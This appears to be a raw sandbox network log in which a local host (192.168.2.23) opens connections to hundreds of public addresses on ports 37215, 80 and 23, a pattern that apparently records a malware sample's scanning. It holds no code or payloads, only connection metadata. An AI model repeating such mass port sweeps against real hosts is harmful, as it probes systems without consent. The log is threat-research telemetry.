                                                          Jan 2, 2024 06:23:46.211828947 CET2452937215192.168.2.2341.32.53.194
                                                          Jan 2, 2024 06:23:46.211828947 CET2452937215192.168.2.23197.158.13.208
                                                          Jan 2, 2024 06:23:46.211849928 CET2452937215192.168.2.23156.33.244.90
                                                          Jan 2, 2024 06:23:46.211849928 CET2452937215192.168.2.2341.49.75.139
                                                          Jan 2, 2024 06:23:46.211850882 CET2452937215192.168.2.23197.9.24.156
                                                          Jan 2, 2024 06:23:46.211859941 CET2452937215192.168.2.23197.36.224.171
                                                          Jan 2, 2024 06:23:46.211862087 CET2452937215192.168.2.23156.254.223.162
                                                          Jan 2, 2024 06:23:46.211862087 CET2452937215192.168.2.23197.240.26.19
                                                          Jan 2, 2024 06:23:46.211869001 CET2452937215192.168.2.23197.109.77.243
                                                          Jan 2, 2024 06:23:46.211869001 CET2452937215192.168.2.2341.73.220.202
                                                          Jan 2, 2024 06:23:46.211883068 CET2452937215192.168.2.23197.204.40.109
                                                          Jan 2, 2024 06:23:46.211886883 CET2452937215192.168.2.23156.43.174.248
                                                          Jan 2, 2024 06:23:46.211890936 CET2452937215192.168.2.23197.236.189.137
                                                          Jan 2, 2024 06:23:46.211894989 CET2452937215192.168.2.23197.115.51.214
                                                          Jan 2, 2024 06:23:46.211896896 CET2452937215192.168.2.23156.93.149.111
                                                          Jan 2, 2024 06:23:46.211896896 CET2452937215192.168.2.23197.94.37.230
                                                          Jan 2, 2024 06:23:46.211896896 CET2452937215192.168.2.23156.63.246.101
                                                          Jan 2, 2024 06:23:46.211910009 CET2452937215192.168.2.23156.24.135.189
                                                          Jan 2, 2024 06:23:46.211915970 CET2452937215192.168.2.2341.239.11.99
                                                          Jan 2, 2024 06:23:46.211916924 CET2452937215192.168.2.23156.99.241.136
                                                          Jan 2, 2024 06:23:46.211916924 CET2452937215192.168.2.23156.198.235.205
                                                          Jan 2, 2024 06:23:46.211920977 CET2452937215192.168.2.23197.23.82.166
                                                          Jan 2, 2024 06:23:46.211920977 CET2452937215192.168.2.2341.146.130.9
                                                          Jan 2, 2024 06:23:46.211921930 CET2452937215192.168.2.23197.78.178.134
                                                          Jan 2, 2024 06:23:46.211920977 CET2452937215192.168.2.2341.14.149.71
                                                          Jan 2, 2024 06:23:46.211937904 CET2452937215192.168.2.23197.61.36.48
                                                          Jan 2, 2024 06:23:46.211940050 CET2452937215192.168.2.2341.250.49.214
                                                          Jan 2, 2024 06:23:46.211946011 CET2452937215192.168.2.2341.124.214.94
                                                          Jan 2, 2024 06:23:46.211949110 CET2452937215192.168.2.23156.13.224.156
                                                          Jan 2, 2024 06:23:46.211950064 CET2452937215192.168.2.23156.21.53.127
                                                          Jan 2, 2024 06:23:46.211950064 CET2452937215192.168.2.23197.154.9.176
                                                          Jan 2, 2024 06:23:46.211955070 CET2452937215192.168.2.2341.152.216.193
                                                          Jan 2, 2024 06:23:46.211955070 CET2452937215192.168.2.23197.62.181.222
                                                          Jan 2, 2024 06:23:46.211965084 CET2452937215192.168.2.2341.245.143.53
                                                          Jan 2, 2024 06:23:46.211967945 CET2452937215192.168.2.23156.237.52.73
                                                          Jan 2, 2024 06:23:46.211968899 CET2452937215192.168.2.23156.100.183.83
                                                          Jan 2, 2024 06:23:46.211971045 CET2452937215192.168.2.23156.175.201.210
                                                          Jan 2, 2024 06:23:46.211971045 CET2452937215192.168.2.23156.196.88.83
                                                          Jan 2, 2024 06:23:46.211971045 CET2452937215192.168.2.23156.156.118.70
                                                          Jan 2, 2024 06:23:46.211987019 CET2452937215192.168.2.23197.233.141.9
                                                          Jan 2, 2024 06:23:46.211993933 CET2452937215192.168.2.23156.56.2.221
                                                          Jan 2, 2024 06:23:46.211993933 CET2452937215192.168.2.23197.139.132.63
                                                          Jan 2, 2024 06:23:46.212006092 CET2452937215192.168.2.23197.164.20.224
                                                          Jan 2, 2024 06:23:46.212007046 CET2452937215192.168.2.2341.17.117.77
                                                          Jan 2, 2024 06:23:46.212018013 CET2452937215192.168.2.23197.106.154.240
                                                          Jan 2, 2024 06:23:46.212027073 CET2452937215192.168.2.23197.63.29.71
                                                          Jan 2, 2024 06:23:46.212028027 CET2452937215192.168.2.2341.252.247.67
                                                          Jan 2, 2024 06:23:46.212029934 CET2452937215192.168.2.23156.254.173.51
                                                          Jan 2, 2024 06:23:46.212029934 CET2452937215192.168.2.23197.206.236.207
                                                          Jan 2, 2024 06:23:46.212030888 CET2452937215192.168.2.23156.102.149.75
                                                          Jan 2, 2024 06:23:46.212030888 CET2452937215192.168.2.23156.100.147.93
                                                          Jan 2, 2024 06:23:46.212030888 CET2452937215192.168.2.23156.50.229.236
                                                          Jan 2, 2024 06:23:46.212030888 CET2452937215192.168.2.23197.189.2.254
                                                          Jan 2, 2024 06:23:46.212042093 CET2452937215192.168.2.23197.185.30.179
                                                          Jan 2, 2024 06:23:46.212042093 CET2452937215192.168.2.2341.203.255.252
                                                          Jan 2, 2024 06:23:46.212050915 CET2452937215192.168.2.23156.42.212.149
                                                          Jan 2, 2024 06:23:46.212059975 CET2452937215192.168.2.2341.29.49.46
                                                          Jan 2, 2024 06:23:46.212059975 CET2452937215192.168.2.23156.220.202.247
                                                          Jan 2, 2024 06:23:46.212064981 CET2452937215192.168.2.23197.17.153.10
                                                          Jan 2, 2024 06:23:46.212073088 CET2452937215192.168.2.23156.154.76.199
                                                          Jan 2, 2024 06:23:46.212073088 CET2452937215192.168.2.2341.245.16.165
                                                          Jan 2, 2024 06:23:46.212075949 CET2452937215192.168.2.2341.32.127.82
                                                          Jan 2, 2024 06:23:46.212075949 CET2452937215192.168.2.23156.48.169.233
                                                          Jan 2, 2024 06:23:46.212075949 CET2452937215192.168.2.2341.167.131.228
                                                          Jan 2, 2024 06:23:46.212080956 CET2452937215192.168.2.23197.126.58.34
                                                          Jan 2, 2024 06:23:46.212093115 CET2452937215192.168.2.23197.173.216.230
                                                          Jan 2, 2024 06:23:46.212094069 CET2452937215192.168.2.23197.184.128.193
                                                          Jan 2, 2024 06:23:46.212094069 CET2452937215192.168.2.23156.129.0.24
                                                          Jan 2, 2024 06:23:46.212102890 CET2452937215192.168.2.2341.198.182.21
                                                          Jan 2, 2024 06:23:46.212105989 CET2452937215192.168.2.23197.216.21.198
                                                          Jan 2, 2024 06:23:46.212105989 CET2452937215192.168.2.2341.109.126.247
                                                          Jan 2, 2024 06:23:46.212107897 CET2452937215192.168.2.2341.119.5.245
                                                          Jan 2, 2024 06:23:46.212107897 CET2452937215192.168.2.23197.186.251.18
                                                          Jan 2, 2024 06:23:46.212107897 CET2452937215192.168.2.2341.199.145.243
                                                          Jan 2, 2024 06:23:46.212111950 CET2452937215192.168.2.2341.200.172.115
                                                          Jan 2, 2024 06:23:46.212119102 CET2452937215192.168.2.2341.52.9.138
                                                          Jan 2, 2024 06:23:46.212119102 CET2452937215192.168.2.23156.248.80.239
                                                          Jan 2, 2024 06:23:46.212120056 CET2452937215192.168.2.23197.123.162.40
                                                          Jan 2, 2024 06:23:46.212136984 CET2452937215192.168.2.23156.232.29.50
                                                          Jan 2, 2024 06:23:46.212136984 CET2452937215192.168.2.23156.197.134.175
                                                          Jan 2, 2024 06:23:46.212138891 CET2452937215192.168.2.23197.36.99.231
                                                          Jan 2, 2024 06:23:46.212150097 CET2452937215192.168.2.23197.161.246.130
                                                          Jan 2, 2024 06:23:46.212152958 CET2452937215192.168.2.2341.1.54.134
                                                          Jan 2, 2024 06:23:46.212152004 CET2452937215192.168.2.2341.163.154.127
                                                          Jan 2, 2024 06:23:46.212158918 CET2452937215192.168.2.23156.98.10.108
                                                          Jan 2, 2024 06:23:46.212160110 CET2452937215192.168.2.23197.118.132.3
                                                          Jan 2, 2024 06:23:46.212174892 CET2452937215192.168.2.2341.226.218.0
                                                          Jan 2, 2024 06:23:46.212184906 CET2452937215192.168.2.2341.185.203.137
                                                          Jan 2, 2024 06:23:46.212187052 CET2452937215192.168.2.23197.2.48.48
                                                          Jan 2, 2024 06:23:46.212187052 CET2452937215192.168.2.23156.93.34.173
                                                          Jan 2, 2024 06:23:46.212188959 CET2452937215192.168.2.23197.140.234.133
                                                          Jan 2, 2024 06:23:46.212188959 CET2452937215192.168.2.2341.140.169.251
                                                          Jan 2, 2024 06:23:46.212188959 CET2452937215192.168.2.23197.191.247.133
                                                          Jan 2, 2024 06:23:46.212193966 CET2452937215192.168.2.23197.19.113.145
                                                          Jan 2, 2024 06:23:46.212199926 CET2452937215192.168.2.23197.119.253.82
                                                          Jan 2, 2024 06:23:46.212199926 CET2452937215192.168.2.23156.99.59.145
                                                          Jan 2, 2024 06:23:46.212208986 CET2452937215192.168.2.23197.72.197.185
                                                          Jan 2, 2024 06:23:46.212208986 CET2452937215192.168.2.23156.251.121.238
                                                          Jan 2, 2024 06:23:46.212210894 CET2452937215192.168.2.2341.157.96.237
                                                          Jan 2, 2024 06:23:46.212214947 CET2452937215192.168.2.23197.140.155.116
                                                          Jan 2, 2024 06:23:46.212327957 CET2452937215192.168.2.23197.67.127.117
                                                          Jan 2, 2024 06:23:46.262578011 CET3721524529197.4.28.65192.168.2.23
                                                          Jan 2, 2024 06:23:46.319241047 CET801837735.244.160.181192.168.2.23
                                                          Jan 2, 2024 06:23:46.319299936 CET1837780192.168.2.2335.244.160.181
                                                          Jan 2, 2024 06:23:46.347951889 CET8018377146.255.186.84192.168.2.23
                                                          Jan 2, 2024 06:23:46.440265894 CET8018377109.106.244.46192.168.2.23
                                                          Jan 2, 2024 06:23:46.440665007 CET1837780192.168.2.23109.106.244.46
                                                          Jan 2, 2024 06:23:46.449629068 CET231426584.172.147.39192.168.2.23
                                                          Jan 2, 2024 06:23:46.455091000 CET2314265152.230.83.57192.168.2.23
                                                          Jan 2, 2024 06:23:46.459842920 CET231426577.38.127.9192.168.2.23
                                                          Jan 2, 2024 06:23:46.461100101 CET231426584.205.227.188192.168.2.23
                                                          Jan 2, 2024 06:23:46.470138073 CET801837789.161.178.104192.168.2.23
                                                          Jan 2, 2024 06:23:46.470181942 CET1837780192.168.2.2389.161.178.104
                                                          Jan 2, 2024 06:23:46.487406015 CET372152452941.142.147.103192.168.2.23
                                                          Jan 2, 2024 06:23:46.487957001 CET801837714.77.161.235192.168.2.23
                                                          Jan 2, 2024 06:23:46.496745110 CET8018377211.230.123.254192.168.2.23
                                                          Jan 2, 2024 06:23:46.500046015 CET2314265102.29.11.84192.168.2.23
                                                          Jan 2, 2024 06:23:46.502511024 CET3721524529156.234.50.37192.168.2.23
                                                          Jan 2, 2024 06:23:46.523621082 CET2314265113.26.49.77192.168.2.23
                                                          Jan 2, 2024 06:23:46.532207012 CET231426534.101.158.212192.168.2.23
                                                          Jan 2, 2024 06:23:46.545336008 CET231426541.242.54.149192.168.2.23
                                                          Jan 2, 2024 06:23:46.564100981 CET2314265116.140.158.114192.168.2.23
                                                          Jan 2, 2024 06:23:46.577164888 CET231426565.20.68.112192.168.2.23
                                                          Jan 2, 2024 06:23:46.588229895 CET2314265202.193.201.16192.168.2.23
                                                          Jan 2, 2024 06:23:46.623871088 CET3721524529197.6.230.94192.168.2.23
                                                          Jan 2, 2024 06:23:46.655642986 CET372152452941.87.2.129192.168.2.23
                                                          Jan 2, 2024 06:23:46.663573980 CET3721524529197.8.7.30192.168.2.23
                                                          Jan 2, 2024 06:23:47.190584898 CET1426523192.168.2.23132.5.145.206
                                                          Jan 2, 2024 06:23:47.190587997 CET1426523192.168.2.23182.164.78.152
                                                          Jan 2, 2024 06:23:47.190587997 CET1426523192.168.2.2352.171.27.47
                                                          Jan 2, 2024 06:23:47.190587997 CET1426523192.168.2.2338.78.167.101
                                                          Jan 2, 2024 06:23:47.190588951 CET1426523192.168.2.2386.211.108.99
                                                          Jan 2, 2024 06:23:47.190588951 CET1426523192.168.2.23190.87.173.183
                                                          Jan 2, 2024 06:23:47.190588951 CET1426523192.168.2.23138.175.196.79
                                                          Jan 2, 2024 06:23:47.190588951 CET1426523192.168.2.23170.145.246.141
                                                          Jan 2, 2024 06:23:47.190596104 CET1426523192.168.2.23143.132.231.206
                                                          Jan 2, 2024 06:23:47.190607071 CET1426523192.168.2.23121.195.10.70
                                                          Jan 2, 2024 06:23:47.190608025 CET1426523192.168.2.2353.100.9.45
                                                          Jan 2, 2024 06:23:47.190608025 CET1426523192.168.2.23218.103.63.159
                                                          Jan 2, 2024 06:23:47.190609932 CET1426523192.168.2.23122.19.121.226
                                                          Jan 2, 2024 06:23:47.190613031 CET1426523192.168.2.23188.221.214.252
                                                          Jan 2, 2024 06:23:47.190613031 CET1426523192.168.2.2373.250.8.199
                                                          Jan 2, 2024 06:23:47.190613985 CET1426523192.168.2.23141.14.254.135
                                                          Jan 2, 2024 06:23:47.190608025 CET1426523192.168.2.2396.127.185.255
                                                          Jan 2, 2024 06:23:47.190608025 CET1426523192.168.2.23194.245.251.183
                                                          Jan 2, 2024 06:23:47.190613985 CET1426523192.168.2.2359.5.157.26
                                                          Jan 2, 2024 06:23:47.190613985 CET1426523192.168.2.2397.21.216.214
                                                          Jan 2, 2024 06:23:47.190613985 CET1426523192.168.2.231.90.119.140
                                                          Jan 2, 2024 06:23:47.190610886 CET1426523192.168.2.2367.128.65.107
                                                          Jan 2, 2024 06:23:47.190610886 CET1426523192.168.2.23107.133.223.93
                                                          Jan 2, 2024 06:23:47.190620899 CET1426523192.168.2.2340.158.12.86
                                                          Jan 2, 2024 06:23:47.190620899 CET1426523192.168.2.23208.126.227.202
                                                          Jan 2, 2024 06:23:47.190620899 CET1426523192.168.2.2361.146.194.60
                                                          Jan 2, 2024 06:23:47.190629959 CET1426523192.168.2.23184.229.189.255
                                                          Jan 2, 2024 06:23:47.190639973 CET1426523192.168.2.23216.113.169.233
                                                          Jan 2, 2024 06:23:47.190646887 CET1426523192.168.2.23164.74.166.64
                                                          Jan 2, 2024 06:23:47.190648079 CET1426523192.168.2.23149.222.130.162
                                                          Jan 2, 2024 06:23:47.190648079 CET1426523192.168.2.2359.162.245.239
                                                          Jan 2, 2024 06:23:47.190648079 CET1426523192.168.2.2369.41.16.111
                                                          Jan 2, 2024 06:23:47.190653086 CET1426523192.168.2.2357.99.185.120
                                                          Jan 2, 2024 06:23:47.190648079 CET1426523192.168.2.23125.144.178.110
                                                          Jan 2, 2024 06:23:47.190648079 CET1426523192.168.2.23117.154.111.252
                                                          Jan 2, 2024 06:23:47.190654039 CET1426523192.168.2.23133.11.27.143
                                                          Jan 2, 2024 06:23:47.190659046 CET1426523192.168.2.2398.104.14.177
                                                          Jan 2, 2024 06:23:47.190659046 CET1426523192.168.2.232.111.67.224
                                                          Jan 2, 2024 06:23:47.190659046 CET1426523192.168.2.2396.79.50.189
                                                          Jan 2, 2024 06:23:47.190659046 CET1426523192.168.2.23205.217.31.113
                                                          Jan 2, 2024 06:23:47.190659046 CET1426523192.168.2.23130.77.22.202
                                                          Jan 2, 2024 06:23:47.190659046 CET1426523192.168.2.23204.16.46.137
                                                          Jan 2, 2024 06:23:47.190659046 CET1426523192.168.2.23102.15.218.177
                                                          Jan 2, 2024 06:23:47.190665960 CET1426523192.168.2.2323.20.90.169
                                                          Jan 2, 2024 06:23:47.190680981 CET1426523192.168.2.23220.24.20.124
                                                          Jan 2, 2024 06:23:47.190681934 CET1426523192.168.2.23212.98.170.173
                                                          Jan 2, 2024 06:23:47.190681934 CET1426523192.168.2.23202.68.153.47
                                                          Jan 2, 2024 06:23:47.190681934 CET1426523192.168.2.23141.167.138.194
                                                          Jan 2, 2024 06:23:47.190681934 CET1426523192.168.2.234.24.86.111
                                                          Jan 2, 2024 06:23:47.190685987 CET1426523192.168.2.2327.76.202.242
                                                          Jan 2, 2024 06:23:47.190700054 CET1426523192.168.2.23183.36.157.86
                                                          Jan 2, 2024 06:23:47.190706968 CET1426523192.168.2.235.23.93.167
                                                          Jan 2, 2024 06:23:47.190709114 CET1426523192.168.2.2393.44.20.75
                                                          Jan 2, 2024 06:23:47.190712929 CET1426523192.168.2.23120.181.22.80
                                                          Jan 2, 2024 06:23:47.190712929 CET1426523192.168.2.23189.96.5.220
                                                          Jan 2, 2024 06:23:47.190713882 CET1426523192.168.2.23120.227.68.0
                                                          Jan 2, 2024 06:23:47.190725088 CET1426523192.168.2.23207.240.235.59
                                                          Jan 2, 2024 06:23:47.190732956 CET1426523192.168.2.23134.106.237.243
                                                          Jan 2, 2024 06:23:47.190732956 CET1426523192.168.2.23205.122.93.44
                                                          Jan 2, 2024 06:23:47.190736055 CET1426523192.168.2.2388.95.49.133
                                                          Jan 2, 2024 06:23:47.190736055 CET1426523192.168.2.23187.200.141.57
                                                          Jan 2, 2024 06:23:47.190738916 CET1426523192.168.2.23187.21.247.200
                                                          Jan 2, 2024 06:23:47.190738916 CET1426523192.168.2.23222.111.68.225
                                                          Jan 2, 2024 06:23:47.190738916 CET1426523192.168.2.23200.85.45.78
                                                          Jan 2, 2024 06:23:47.190747976 CET1426523192.168.2.2396.49.121.250
                                                          Jan 2, 2024 06:23:47.190748930 CET1426523192.168.2.2314.222.52.212
                                                          Jan 2, 2024 06:23:47.190751076 CET1426523192.168.2.23108.179.45.18
                                                          Jan 2, 2024 06:23:47.190752983 CET1426523192.168.2.23137.198.3.35
                                                          Jan 2, 2024 06:23:47.190752983 CET1426523192.168.2.23168.7.32.253
                                                          Jan 2, 2024 06:23:47.190753937 CET1426523192.168.2.2380.177.212.59
                                                          Jan 2, 2024 06:23:47.190758944 CET1426523192.168.2.2376.115.251.225
                                                          Jan 2, 2024 06:23:47.190762043 CET1426523192.168.2.2323.177.65.0
                                                          Jan 2, 2024 06:23:47.190762997 CET1426523192.168.2.23217.40.159.124
                                                          Jan 2, 2024 06:23:47.190762997 CET1426523192.168.2.23111.86.233.20
                                                          Jan 2, 2024 06:23:47.190762997 CET1426523192.168.2.2365.126.71.225
                                                          Jan 2, 2024 06:23:47.190778017 CET1426523192.168.2.23147.49.13.220
                                                          Jan 2, 2024 06:23:47.190782070 CET1426523192.168.2.2320.154.51.133
                                                          Jan 2, 2024 06:23:47.190782070 CET1426523192.168.2.23111.39.171.234
                                                          Jan 2, 2024 06:23:47.190782070 CET1426523192.168.2.23175.76.143.6
                                                          Jan 2, 2024 06:23:47.190783978 CET1426523192.168.2.23119.188.87.248
                                                          Jan 2, 2024 06:23:47.190793991 CET1426523192.168.2.23155.50.93.195
                                                          Jan 2, 2024 06:23:47.190800905 CET1426523192.168.2.2395.115.226.178
                                                          Jan 2, 2024 06:23:47.190800905 CET1426523192.168.2.23181.112.101.31
                                                          Jan 2, 2024 06:23:47.190810919 CET1426523192.168.2.23142.150.246.17
                                                          Jan 2, 2024 06:23:47.190814018 CET1426523192.168.2.23194.164.9.87
                                                          Jan 2, 2024 06:23:47.190814018 CET1426523192.168.2.2364.157.197.1
                                                          Jan 2, 2024 06:23:47.190820932 CET1426523192.168.2.23138.50.190.60
                                                          Jan 2, 2024 06:23:47.190821886 CET1426523192.168.2.231.213.123.146
                                                          Jan 2, 2024 06:23:47.190821886 CET1426523192.168.2.2346.251.75.101
                                                          Jan 2, 2024 06:23:47.190823078 CET1426523192.168.2.23123.59.87.249
                                                          Jan 2, 2024 06:23:47.190824032 CET1426523192.168.2.239.106.6.170
                                                          Jan 2, 2024 06:23:47.190824032 CET1426523192.168.2.23222.221.38.46
                                                          Jan 2, 2024 06:23:47.190829992 CET1426523192.168.2.23217.124.41.210
                                                          Jan 2, 2024 06:23:47.190829992 CET1426523192.168.2.2398.126.156.64
                                                          Jan 2, 2024 06:23:47.190839052 CET1426523192.168.2.2337.74.60.190
                                                          Jan 2, 2024 06:23:47.190839052 CET1426523192.168.2.23124.89.249.21
                                                          Jan 2, 2024 06:23:47.190843105 CET1426523192.168.2.2392.105.222.67
                                                          Jan 2, 2024 06:23:47.190844059 CET1426523192.168.2.23163.54.3.55
                                                          Jan 2, 2024 06:23:47.190844059 CET1426523192.168.2.23201.88.112.169
                                                          Jan 2, 2024 06:23:47.190844059 CET1426523192.168.2.23219.246.29.54
                                                          Jan 2, 2024 06:23:47.190856934 CET1426523192.168.2.2371.135.219.207
                                                          Jan 2, 2024 06:23:47.190859079 CET1426523192.168.2.2398.138.168.240
                                                          Jan 2, 2024 06:23:47.190859079 CET1426523192.168.2.23218.74.109.64
                                                          Jan 2, 2024 06:23:47.190876007 CET1426523192.168.2.2368.5.249.249
                                                          Jan 2, 2024 06:23:47.190879107 CET1426523192.168.2.23122.200.49.248
                                                          Jan 2, 2024 06:23:47.190884113 CET1426523192.168.2.23112.158.135.25
                                                          Jan 2, 2024 06:23:47.190886021 CET1426523192.168.2.23126.8.182.121
                                                          Jan 2, 2024 06:23:47.190897942 CET1426523192.168.2.23219.53.123.167
                                                          Jan 2, 2024 06:23:47.190901995 CET1426523192.168.2.2395.139.118.176
                                                          Jan 2, 2024 06:23:47.190901995 CET1426523192.168.2.23165.232.63.208
                                                          Jan 2, 2024 06:23:47.190901995 CET1426523192.168.2.2382.107.247.254
                                                          Jan 2, 2024 06:23:47.190907955 CET1426523192.168.2.2369.93.91.25
                                                          Jan 2, 2024 06:23:47.190916061 CET1426523192.168.2.23159.172.95.0
                                                          Jan 2, 2024 06:23:47.190917969 CET1426523192.168.2.2371.144.130.124
                                                          Jan 2, 2024 06:23:47.190933943 CET1426523192.168.2.23154.231.143.136
                                                          Jan 2, 2024 06:23:47.190934896 CET1426523192.168.2.23187.49.111.188
                                                          Jan 2, 2024 06:23:47.190937996 CET1426523192.168.2.23136.82.184.5
                                                          Jan 2, 2024 06:23:47.190939903 CET1426523192.168.2.23102.255.118.181
                                                          Jan 2, 2024 06:23:47.190949917 CET1426523192.168.2.23159.215.61.236
                                                          Jan 2, 2024 06:23:47.190953970 CET1426523192.168.2.2339.247.220.212
                                                          Jan 2, 2024 06:23:47.190962076 CET1426523192.168.2.2358.128.80.134
                                                          Jan 2, 2024 06:23:47.190969944 CET1426523192.168.2.2358.97.32.8
                                                          Jan 2, 2024 06:23:47.190970898 CET1426523192.168.2.2324.102.215.145
                                                          Jan 2, 2024 06:23:47.190970898 CET1426523192.168.2.23218.12.71.135
                                                          Jan 2, 2024 06:23:47.190987110 CET1426523192.168.2.23179.169.162.142
                                                          Jan 2, 2024 06:23:47.190987110 CET1426523192.168.2.23196.25.252.92
                                                          Jan 2, 2024 06:23:47.190988064 CET1426523192.168.2.23121.183.243.20
                                                          Jan 2, 2024 06:23:47.191000938 CET1426523192.168.2.23135.86.153.174
                                                          Jan 2, 2024 06:23:47.191001892 CET1426523192.168.2.2368.97.182.157
                                                          Jan 2, 2024 06:23:47.191023111 CET1426523192.168.2.23104.92.70.8
                                                          Jan 2, 2024 06:23:47.191023111 CET1426523192.168.2.231.24.212.109
                                                          Jan 2, 2024 06:23:47.191025019 CET1426523192.168.2.23217.14.38.125
                                                          Jan 2, 2024 06:23:47.191025972 CET1426523192.168.2.23107.102.188.188
                                                          Jan 2, 2024 06:23:47.191030979 CET1426523192.168.2.2364.66.117.164
                                                          Jan 2, 2024 06:23:47.191030979 CET1426523192.168.2.2338.96.57.161
                                                          Jan 2, 2024 06:23:47.191030979 CET1426523192.168.2.23116.236.192.68
                                                          Jan 2, 2024 06:23:47.191030979 CET1426523192.168.2.2353.67.153.28
                                                          Jan 2, 2024 06:23:47.191035032 CET1426523192.168.2.2365.81.52.102
                                                          Jan 2, 2024 06:23:47.191045046 CET1426523192.168.2.23221.85.31.157
                                                          Jan 2, 2024 06:23:47.191047907 CET1426523192.168.2.23122.78.24.248
                                                          Jan 2, 2024 06:23:47.191049099 CET1426523192.168.2.23163.238.42.200
                                                          Jan 2, 2024 06:23:47.191049099 CET1426523192.168.2.23131.18.209.167
                                                          Jan 2, 2024 06:23:47.191051006 CET1426523192.168.2.23212.168.104.18
                                                          Jan 2, 2024 06:23:47.191056967 CET1426523192.168.2.2351.157.132.197
                                                          Jan 2, 2024 06:23:47.191077948 CET1426523192.168.2.23133.164.90.55
                                                          Jan 2, 2024 06:23:47.191077948 CET1426523192.168.2.2388.165.148.149
                                                          Jan 2, 2024 06:23:47.191081047 CET1426523192.168.2.2369.96.42.235
                                                          Jan 2, 2024 06:23:47.191081047 CET1426523192.168.2.23182.162.89.42
                                                          Jan 2, 2024 06:23:47.191086054 CET1426523192.168.2.23104.1.17.105
                                                          Jan 2, 2024 06:23:47.191088915 CET1426523192.168.2.2380.111.38.17
                                                          Jan 2, 2024 06:23:47.191091061 CET1426523192.168.2.2340.55.244.42
                                                          Jan 2, 2024 06:23:47.191097021 CET1426523192.168.2.2375.113.137.172
                                                          Jan 2, 2024 06:23:47.191112995 CET1426523192.168.2.23106.160.237.108
                                                          Jan 2, 2024 06:23:47.191116095 CET1426523192.168.2.2397.196.37.140
                                                          Jan 2, 2024 06:23:47.191116095 CET1426523192.168.2.2342.181.36.243
                                                          Jan 2, 2024 06:23:47.191124916 CET1426523192.168.2.23111.249.136.170
                                                          Jan 2, 2024 06:23:47.191127062 CET1426523192.168.2.2382.37.51.46
                                                          Jan 2, 2024 06:23:47.191128016 CET1426523192.168.2.23208.151.95.35
                                                          Jan 2, 2024 06:23:47.191138029 CET1426523192.168.2.23126.169.18.90
                                                          Jan 2, 2024 06:23:47.191140890 CET1426523192.168.2.23143.141.254.193
                                                          Jan 2, 2024 06:23:47.191148996 CET1426523192.168.2.2364.153.24.3
                                                          Jan 2, 2024 06:23:47.191163063 CET1426523192.168.2.2367.189.151.147
                                                          Jan 2, 2024 06:23:47.191163063 CET1426523192.168.2.23136.222.31.33
                                                          Jan 2, 2024 06:23:47.191164970 CET1426523192.168.2.2314.248.188.65
                                                          Jan 2, 2024 06:23:47.191169977 CET1426523192.168.2.2380.254.97.145
                                                          Jan 2, 2024 06:23:47.191179037 CET1426523192.168.2.23101.240.39.80
                                                          Jan 2, 2024 06:23:47.191179037 CET1426523192.168.2.23133.16.254.206
                                                          Jan 2, 2024 06:23:47.191180944 CET1426523192.168.2.23187.40.254.178
                                                          Jan 2, 2024 06:23:47.191189051 CET1426523192.168.2.23207.22.69.134
                                                          Jan 2, 2024 06:23:47.191189051 CET1426523192.168.2.23170.169.249.65
                                                          Jan 2, 2024 06:23:47.191212893 CET1426523192.168.2.23133.145.112.74
                                                          Jan 2, 2024 06:23:47.191212893 CET1426523192.168.2.2389.206.44.158
                                                          Jan 2, 2024 06:23:47.191212893 CET1426523192.168.2.23196.28.96.208
                                                          Jan 2, 2024 06:23:47.191235065 CET1426523192.168.2.23110.149.226.158
                                                          Jan 2, 2024 06:23:47.191246986 CET1426523192.168.2.2374.71.182.247
                                                          Jan 2, 2024 06:23:47.191247940 CET1426523192.168.2.2368.89.45.220
                                                          Jan 2, 2024 06:23:47.191247940 CET1426523192.168.2.23109.180.63.28
                                                          Jan 2, 2024 06:23:47.191247940 CET1426523192.168.2.2340.145.225.37
                                                          Jan 2, 2024 06:23:47.191247940 CET1426523192.168.2.2338.24.121.42
                                                          Jan 2, 2024 06:23:47.191247940 CET1426523192.168.2.23172.214.97.37
                                                          Jan 2, 2024 06:23:47.191252947 CET1426523192.168.2.2375.83.64.62
                                                          Jan 2, 2024 06:23:47.191255093 CET1426523192.168.2.2347.63.114.189
                                                          Jan 2, 2024 06:23:47.191262007 CET1426523192.168.2.23188.161.223.248
                                                          Jan 2, 2024 06:23:47.191272974 CET1426523192.168.2.2348.225.159.52
                                                          Jan 2, 2024 06:23:47.191272974 CET1426523192.168.2.2336.208.71.196
                                                          Jan 2, 2024 06:23:47.191277981 CET1426523192.168.2.23213.237.129.224
                                                          Jan 2, 2024 06:23:47.191282034 CET1426523192.168.2.23136.159.177.89
                                                          Jan 2, 2024 06:23:47.191292048 CET1426523192.168.2.23174.159.110.232
                                                          Jan 2, 2024 06:23:47.191293955 CET1426523192.168.2.23144.34.67.189
                                                          Jan 2, 2024 06:23:47.191304922 CET1426523192.168.2.2370.53.109.115
                                                          Jan 2, 2024 06:23:47.191313982 CET1426523192.168.2.23190.155.246.155
                                                          Jan 2, 2024 06:23:47.191323042 CET1426523192.168.2.23118.178.250.193
                                                          Jan 2, 2024 06:23:47.191323042 CET1426523192.168.2.23171.186.161.124
                                                          Jan 2, 2024 06:23:47.191327095 CET1426523192.168.2.23153.176.80.187
                                                          Jan 2, 2024 06:23:47.191329002 CET1426523192.168.2.2376.130.168.10
                                                          Jan 2, 2024 06:23:47.191330910 CET1426523192.168.2.23192.58.249.191
                                                          Jan 2, 2024 06:23:47.191330910 CET1426523192.168.2.23137.173.221.188
                                                          Jan 2, 2024 06:23:47.191332102 CET1426523192.168.2.2331.93.240.254
                                                          Jan 2, 2024 06:23:47.191334963 CET1426523192.168.2.23121.188.154.240
                                                          Jan 2, 2024 06:23:47.191344976 CET1426523192.168.2.2317.189.136.99
                                                          Jan 2, 2024 06:23:47.191353083 CET1426523192.168.2.239.23.57.170
                                                          Jan 2, 2024 06:23:47.191354036 CET1426523192.168.2.23104.85.148.216
                                                          Jan 2, 2024 06:23:47.191356897 CET1426523192.168.2.2392.165.171.111
                                                          Jan 2, 2024 06:23:47.191370964 CET1426523192.168.2.239.254.66.224
                                                          Jan 2, 2024 06:23:47.191370964 CET1426523192.168.2.23202.92.149.156
                                                          Jan 2, 2024 06:23:47.191375971 CET1426523192.168.2.23183.233.211.76
                                                          Jan 2, 2024 06:23:47.191380978 CET1426523192.168.2.23200.160.12.31
                                                          Jan 2, 2024 06:23:47.191382885 CET1426523192.168.2.2394.168.208.2
                                                          Jan 2, 2024 06:23:47.191390038 CET1426523192.168.2.234.4.217.96
                                                          Jan 2, 2024 06:23:47.191390038 CET1426523192.168.2.232.207.162.157
                                                          Jan 2, 2024 06:23:47.191410065 CET1426523192.168.2.23170.17.42.236
